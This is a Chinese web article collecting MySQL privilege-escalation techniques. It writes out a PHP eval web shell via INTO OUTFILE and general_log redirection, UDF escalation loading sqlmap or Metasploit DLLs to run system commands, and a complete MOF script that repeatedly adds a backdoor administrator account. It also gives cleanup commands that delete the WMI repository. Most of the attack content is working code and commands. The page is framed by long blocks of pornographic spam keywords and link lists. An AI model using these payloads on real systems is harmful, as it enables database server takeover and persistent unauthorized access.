成人性生交大片免费看视频r_亚洲综合极品香蕉久久网_在线视频免费观看一区_亚洲精品亚洲人成人网在线播放_国产精品毛片av_久久久久国产精品www_亚洲国产一区二区三区在线播_日韩一区二区三区四区区区_亚洲精品国产无套在线观_国产免费www

主頁 > 知識(shí)庫 > Mysql提權(quán)的多種姿勢匯總

Mysql提權(quán)的多種姿勢匯總

熱門標(biāo)簽:大眾點(diǎn)評(píng)星級(jí)酒店地圖標(biāo)注 高清地圖標(biāo)注道路 話務(wù)外呼系統(tǒng)怎么樣 外東北地圖標(biāo)注 臨清電話機(jī)器人 400電話可以辦理嗎 拉卡拉外呼系統(tǒng) 云南電商智能外呼系統(tǒng)價(jià)格 智能外呼系統(tǒng)復(fù)位

一、寫入Webshell

into outfile 寫shell

前提條件:

1、知道網(wǎng)站物理路徑

2、高權(quán)限數(shù)據(jù)庫用戶

3、load_file() 開啟 即 secure_file_priv 無限制

4、網(wǎng)站路徑有寫入權(quán)限

首先基礎(chǔ)語法查詢是否 secure_file_priv 沒有限制

show global variables like '%secure_file_priv%';

value 說明
NULL 不允許導(dǎo)入或?qū)С?/td>
/var 只允許在/var目錄導(dǎo)入導(dǎo)出
不限制目錄

在 MySQL 5.5 之前 secure_file_priv 默認(rèn)是空,這個(gè)情況下可以向任意絕對(duì)路徑寫文件

在 MySQL 5.5之后 secure_file_priv 默認(rèn)是 NULL,這個(gè)情況下不可以寫文件

如果滿足上述所有條件的話,那么可以嘗試使用下面的 SQL 語句來直接寫 shell:

select '?php @eval($_POST[cmd]); ?>' into outfile 'C:\\soft\\WWW\\empirecms\\shell.php';

查看目標(biāo)路徑下,已寫入shell.php文件

上菜刀連接

日志文件寫shell

前提條件:

1、Web 文件夾寬松權(quán)限可以寫入

2、Windows 系統(tǒng)下

3、高權(quán)限運(yùn)行 MySQL 或者 Apache

MySQL 5.0 版本以上會(huì)創(chuàng)建日志文件,可以通過修改日志的全局變量來 getshell

查看日志目錄

SHOW VARIABLES LIKE 'general%';

general_log 默認(rèn)關(guān)閉,開啟它可以記錄用戶輸入的每條命令,會(huì)把其保存在對(duì)應(yīng)的日志文件中。
可以嘗試自定義日志文件,并向日志文件里面寫入內(nèi)容的話,那么就可以成功 getshell:

更改日志文件位置

set global general_log = "ON";
set global general_log_file='C:\\soft\\WWW\\empirecms\\log.php';

查看當(dāng)前日志配置

目標(biāo)目錄下查看,寫入了log.php文件

寫入shell

select '?php @eval($_POST[cmd]); ?>'

上菜刀,連接


二、UDF提權(quán)

自定義函數(shù),是數(shù)據(jù)庫功能的一種擴(kuò)展。用戶通過自定義函數(shù)可以實(shí)現(xiàn)在 MySQL 中無法方便實(shí)現(xiàn)的功能,其添加的新函數(shù)都可以在SQL語句中調(diào)用,就像調(diào)用本機(jī)函數(shù) version() 等方便。

動(dòng)態(tài)鏈接庫

如果是 MySQL >= 5.1 的版本,必須把 UDF 的動(dòng)態(tài)鏈接庫文件放置于 MySQL 安裝目錄下的 lib\plugin 文件夾下文件夾下才能創(chuàng)建自定義函數(shù)。

那么動(dòng)態(tài)鏈接庫文件去哪里找呢?實(shí)際上我們常用的工具 sqlmap 和 Metasploit 里面都自帶了對(duì)應(yīng)系統(tǒng)的動(dòng)態(tài)鏈接庫文件。

sqlmap的UDF動(dòng)態(tài)鏈接庫文件位置

sqlmap根目錄/data/udf/mysql

不過 sqlmap 中 自帶這些動(dòng)態(tài)鏈接庫為了防止被誤殺都經(jīng)過編碼處理過,不能被直接使用。不過可以利用 sqlmap 自帶的解碼工具cloak.py 來解碼使用,cloak.py 的位置為:sqlmap根目錄/extra/cloak/cloak.py ,

解碼方法如下:

解碼32位的windows動(dòng)態(tài)鏈接庫:

python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll

其他linux和windows動(dòng)態(tài)鏈接庫解碼類似

或者直接使用metasploit自帶的動(dòng)態(tài)鏈接庫,無需解碼

Metasploit的UDF動(dòng)態(tài)鏈接庫文件位置

接下來的任務(wù)是把 UDF 的動(dòng)態(tài)鏈接庫文件放到 MySQL 的插件目錄下,這個(gè)目錄改如何去尋找呢?可以使用如下的 SQL 語句來查詢:

show variables like '%plugin%'


寫入動(dòng)態(tài)鏈接庫

當(dāng) secure_file_priv 無限制的時(shí)候,我們可以手工寫文件到 plugin 目錄下的

select load_file('C:\\soft\\UDFmysql\\lib_mysqludf_sys_32.dll')  into dumpfile 'C:\\soft\\MySQL\\lib\\plugin\\udf.dll';

c

創(chuàng)建自定義函數(shù)并調(diào)用命令

創(chuàng)建自定義函數(shù)

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

查看是否新增了sys_eval

接著就可以通過創(chuàng)建的這個(gè)函數(shù)來執(zhí)行系統(tǒng)命令了:

刪除自定義函數(shù)

drop function sys_eval;

三、MOF提權(quán)

mof提權(quán)原理

關(guān)于 mof 提權(quán)的原理其實(shí)很簡單,就是利用了 c:/windows/system32/wbem/mof/ 目錄下的 nullevt.mof 文件,每分鐘都會(huì)在一個(gè)特定的時(shí)間去執(zhí)行一次的特性,來寫入我們的cmd命令使其被帶入執(zhí)行。

嚴(yán)苛的前提條件:

1.windows 03及以下版本

2.mysql啟動(dòng)身份具有權(quán)限去讀寫c:/windows/system32/wbem/mof目錄

3.secure-file-priv參數(shù)不為null

提權(quán)過程:

MOF文件每五秒就會(huì)執(zhí)行,而且是系統(tǒng)權(quán)限,我們通過mysql使用load_file 將文件寫入/wbme/mof,然后系統(tǒng)每隔五秒就會(huì)執(zhí)行一次我們上傳的MOF。MOF當(dāng)中有一段是vbs腳本,我們可以通過控制這段vbs腳本的內(nèi)容讓系統(tǒng)執(zhí)行命令,進(jìn)行提權(quán)。

利用代碼如下(test.mof):

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")\nWSH.run(\"net.exe localgroup administrators hpdoger /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

MOF文件利用:

將上面的腳本上傳到有讀寫權(quán)限的目錄下:

這里我上傳到了C:\soft\,我們使用sql語句將文件導(dǎo)入到c:/windows/system32/wbem/mof/下

select load_file("C:/soft/test.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"

驗(yàn)證提權(quán):

當(dāng)我們成功把mof導(dǎo)出時(shí),mof就會(huì)直接被執(zhí)行,且5秒創(chuàng)建一次用戶。

關(guān)于MOF提權(quán)弊端

我們提權(quán)成功后,就算被刪號(hào),mof也會(huì)在五秒內(nèi)將原賬號(hào)重建,那么這給我們退出測試造成了很大的困擾,所以謹(jǐn)慎使用。那么我們?nèi)绾蝿h掉我們的入侵賬號(hào)呢?

cmd 下運(yùn)行下面語句:

#停止winmgmt服務(wù)
net stop winmgmt

#刪除 Repository 文件夾
rmdir /s /q C:\Windows\system32\wbem\Repository\


# 手動(dòng)刪除 mof 文件
del c:/windows/system32/wbem/mof/nullevt.mof /F /S

# 刪除創(chuàng)建的用戶
net user hpdoger /delete

#重啟服務(wù)
net start winmgmt

總結(jié)

到此這篇關(guān)于Mysql提權(quán)姿勢的文章就介紹到這了,更多相關(guān)Mysql提權(quán)姿勢內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

您可能感興趣的文章:
  • Linux利用UDF庫實(shí)現(xiàn)Mysql提權(quán)
  • Mysql提權(quán)方法利用
  • 提權(quán),以MySQL之名

標(biāo)簽:山西 溫州 揚(yáng)州 三明 福州 阿里 無錫 定西

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《Mysql提權(quán)的多種姿勢匯總》,本文關(guān)鍵詞  Mysql,提權(quán),的,多種,姿勢,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《Mysql提權(quán)的多種姿勢匯總》相關(guān)的同類信息!
  • 本頁收集關(guān)于Mysql提權(quán)的多種姿勢匯總的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    日产午夜精品一线二线三线| 久久国产精品99国产精| 成年人在线播放| 久久99成人| 色欲一区二区三区精品a片| 男裸体无遮挡网站| 黄大色黄女片18第一次| 麻豆视频网站在线观看| 51一区二区三区| 精品免费日产一区一区三区免费| 性色av一区二区| 日韩麻豆第一页| 蜜桃一区av| 欧美乱大交做爰xxxⅹ性3| 亚洲天堂一区二区三区四区| 亚洲啪av永久无码精品放毛片| 亚洲大香人伊一本线| 亚洲欧美日韩色| 日本欧美视频| 国产精品日韩二区| 97视频在线观看免费| 亚洲人高潮女人毛茸茸| 黑人巨茎大战欧美白妇| 在线观看亚洲精品福利片| 先锋av在线资源| 三级不卡在线观看| 2023国产精品久久久精品双| 日韩不卡一二三| 国产制服91一区二区三区制服| 美女网站免费观看| 亚洲一区二区偷拍精品| 成人免费在线网址| 国产日韩欧美高清| 欧美一级片在线观看| 久久久av一区| 四虎永久成年免费影院| 日本少妇毛茸茸| 狠狠色噜噜狠狠狠狠888奇米| 亚洲欧美另类小说| 国产日韩精品中文字无码| 884aa四虎影成人精品一区| 91精彩在线视频| 有坂深雪av一区二区精品| 91大神在线网站| 亚洲黄页一区| 中文字幕av无码一区二区三区| 在线观看免费av网| 亚洲成人在线观看视频| 日本在线播放一区| 成人av无码一区二区三区| 亚洲国产欧美一区二区三区不卡| 天天做夜夜做人人爱精品| 中国一区二区三区| 黄瓜视频网站| 色欲一区二区三区精品a片| 久久porn| 精品一区二区三区中文字幕在线| 韩国免费在线视频| 椎名由奈av一区二区三区| 麻豆精品不卡国产免费看| 精品国产区一区二| 亚洲男人的天堂一区二区| av大片在线观看| 国产精品国产三级国产aⅴ9色| 亚洲 欧美 激情 另类| 成人免费高清视频| 亚洲香肠在线观看| 日韩伦理三区| 吞精囗交69激情欧美| 亚洲国产99精品国自产| 国产精品国产三级国产在线观看| 亚洲图片欧美在线| 欧美暴力喷水在线| 日本免费黄色网| 国产乱码精品一区二三赶尸艳谈| 天天操天天干天天做| 欧美日韩第一视频| 亚洲黄色片在线观看| 日韩福利电影在线观看| 国产男女无套在线播放| 黄色成人91| 欧美日韩精品一区二区天天拍小说| 亚洲の无码国产の无码步美| 日韩亚洲一区中文字幕| 中文官网资源新版中文第二页在线观看| 中文字幕在线播放一区| 可以在线观看的av网站| 日本免费在线视频观看| 人人干狠狠干| 亚洲图片制服诱惑| 国产麻豆精品视频| www.在线观看av| www精品久久| 熟妇高潮精品一区二区三区| 精品少妇一二三区| 亚洲成人在线免费| 精品综合久久久久久8888| 国产精品久久久久7777婷婷| 国产99久久精品一区二区| 宅男视频免费在线观看视频| 在线日韩av| 在线免费观看成人短视频| 亚洲综合电影一区二区三区| 国产精品免费一区豆花| 欧美少妇一区二区| 亚洲三级电影全部在线观看高清| 搡老女人一区二区三区视频tv| 五月天黄色网址| 亚洲精品666| 国产一区二区精品调教| 国产激情在线观看视频| av免费看网址| 精品国模一区二区三区| 香蕉青柠影院| 亚洲色图 校园春色| 国产专区在线播放| 欧美成人在线网站| 国产一区二区免费看| 激情图片小说一区| 日本一区二区三区在线观看视频| 欧美与黑人午夜性猛交久久久| 久久精品一二三| 天天草天天操| 亚洲成人久久一区| 亚洲在线观看网站| 成人精品高清在线视频| 欧美mv日韩mv国产网站app| 欧美精品九九| 沈樵精品国产成av片| 国产精品一区二区三区四| 成人夜色视频网站在线观看| 国产成人av免费在线观看| 影音先锋久久久| 蜜臀a∨国产成人精品| 欧美成人久久久| 日本aⅴ亚洲精品中文乱码| 日本精品免费视频| 亚洲精品国产一区| www.黄在线| 在线观看国产精品日韩av| 久久精品国产美女| 大地资源第二页在线观看高清版| 欧美金发大战黑人最粗videos| 尤物视频在线视频| 免费大片黄在线观看| 欧美色图一区二区| 最近2019年中文视频免费在线观看| 成人免费自拍视频| 青青久久精品| 国产一区二区在线视频| 国产麻豆成人传媒免费观看| 99精品欧美一区二区蜜桃免费| 99久久99久久精品国产片果冻| 日韩在线你懂得| 水蜜桃免费高清视频在线播放| 96亚洲精品久久久蜜桃| 国产精品一区二区女厕厕| 日韩高清在线不卡| 欧美日韩精品在线观看视频| 国产精品美女在线观看直播| 久久久久久久久久综合| 美女诱惑一区二区| 青娱乐免费在线视频| 图片区小说区亚洲| 国产福利微拍精品一区二区| 91色婷婷久久久久合中文| 久久免费看毛片| 亚洲伊人春色| 色呦呦视频在线| 国产手机视频在线观看| 国产福利成人在线| 无码人妻丰满熟妇精品区| 日韩免费视频一区二区| 黄色大片a级| 免费精品一区二区三区在线观看| 国产精品女主播一区二区三区| 成人高清在线观看免费| 91精品国产色综合久久不卡98口| 欧美最顶级a∨艳星| 自拍偷拍99| 在线观看精品视频| 国产3p露脸普通话对白| 日本高清免费电影一区| 精品国产一区二区三区无码| 日韩中文字幕在线免费观看| 欧美最猛性xxxxx(亚洲精品)| 色噜噜狠狠色综合中国| 国产精品黄色av| 欧美精品精品一区| 国产亚洲成aⅴ人片在线观看| 成人观看网址| 日韩和的一区二在线| 国产美女三级无套内谢| 国产在线看片免费视频在线观看| 中文字幕av中文字幕| 久久天堂影院| 中文字幕av影院| 中文字幕免费精品一区| 免费在线观看一区二区| 一区二区三区四区久久| 亚洲综合免费视频| 日韩欧美另类在线| 蝴蝶中文综合娱乐网| 色佬视频在线观看| 色天天综合色天天久久| 成全电影大全在线观看| 国产在线观看你懂的| 亚洲色图视频免费播放| 欧美精品一区二区三区免费播放| 好吊操这里只有精品| 国产麻豆一精品一av一免费| www.久久国产| 欧美裸体男粗大视频在线观看| 中文成人在线| 污黄网站在线观看| 日韩成人中文字幕| xxxxxx国产精品视频| 丁香婷婷深情五月亚洲| 国产毛片精品一区| 国产人妻精品久久久久野外| 成人在线观看一区二区| 国产精品一区二区女厕厕| 久久综合久久久| 日韩伦理在线一区| 嫩草懂你的影院| 性xxxx欧美老肥妇牲乱| 欧美1区2区3| www.国产一区| 欧美精品在欧美一区二区少妇| 亚洲黄色片视频| 亚洲第一成年网| 精品亚洲a∨| 欧美欧美黄在线二区| 亚洲国产成人精品女人久久久| 色资源网站在线观看| 免费观看又污又黄在线观看国产| av在线影院| 国产成人精品亚洲日本在线观看| 国内精品伊人久久久久影院对白| 亚洲黄色小说在线观看| 欧美在线不卡一区| 色综合久久久久久久久久久| 久草免费福利视频| 综合一区中文字幕| 国产精品日本欧美一区二区三区| 国产综合中文字幕| 国产九九九视频| 精品人妻一区二区三区视频| 亚洲大片在线| 91国产丝袜在线放| 一区二区三区www污污污网站| 黄色91在线观看| 三级国产在线观看| 97在线观看视频| 成人18网址在线观看| 羞羞视频在线观看欧美| 91tv精品福利国产在线观看| 免费看电影在线| 精品无码久久久久久久久| 精品免费视频123区| 亚洲伦理在线| 久久男人的天堂| 国产精品啊v在线| 亚洲色图 校园春色| 国产一区二区三区国产精品| 性一交一乱一色一免费无遮挡| 国产精品久久久久久模特| 欧美草逼视频| 久久99久久久精品欧美| 国产精品久久久久久人| 国产精品日韩一区| 欧美 亚欧 日韩视频在线| 日韩美女一区| 欧美国产激情二区三区| 欧美一区二区在线视频| 狼人综合视频| 亚洲色诱最新| 亚洲欧美在线人成swag| 另类专区欧美蜜桃臀第一页| 国产视频自拍一区| 天天草夜夜草| 欧美激情视频免费看| 福利视频导航一区| 日韩一区二区三区精品| 美女av在线播放| 国产精品99久久免费观看| 国内精品不卡一区二区三区| 四虎影院在线域名免费观看| 美国十次综合久久| 国产精品久久久久久麻豆一区软件| 日韩av加勒比| 45www国产精品网站| 91精品国产91久久久久久最新| www婷婷av久久久影片| 国产一区二区在线视频| 深夜影院在线观看| 国产精品一区二三区| 欧美激情一区二区三区p站| 国模私拍国内精品国内av| 特级丰满少妇一级aaaa爱毛片| 波多野结衣亚洲一区| 国内精品露脸在线视频播放| 高清在线一区| 欧美艾v福利视频在线观看| 国产精品久久久视频| 色综合久久88色综合天天提莫| 亚洲一区二区四区蜜桃| 国产美女网站视频| 日韩精品久久久久久福利| 国产熟妇搡bbbb搡bbbb| 欧美亚洲人成在线| 久久久久久99精品| 国产一区二区三区综合| 亚洲一区二区自拍偷拍| 高清一区二区三区av| 中文字幕一区在线观看| 日韩精品一区二区三| 成人午夜伦理影院| 欧美三级午夜理伦三级中文幕| 成年人小视频在线观看| 91p九色成人| 色狠狠av一区二区三区香蕉蜜桃| 中文字幕一区二区三区免费看| 成人网男人的天堂| 亚洲国产午夜| 亚洲日韩欧美视频一区| 亚洲高清成人| 色www永久免费视频首页在线|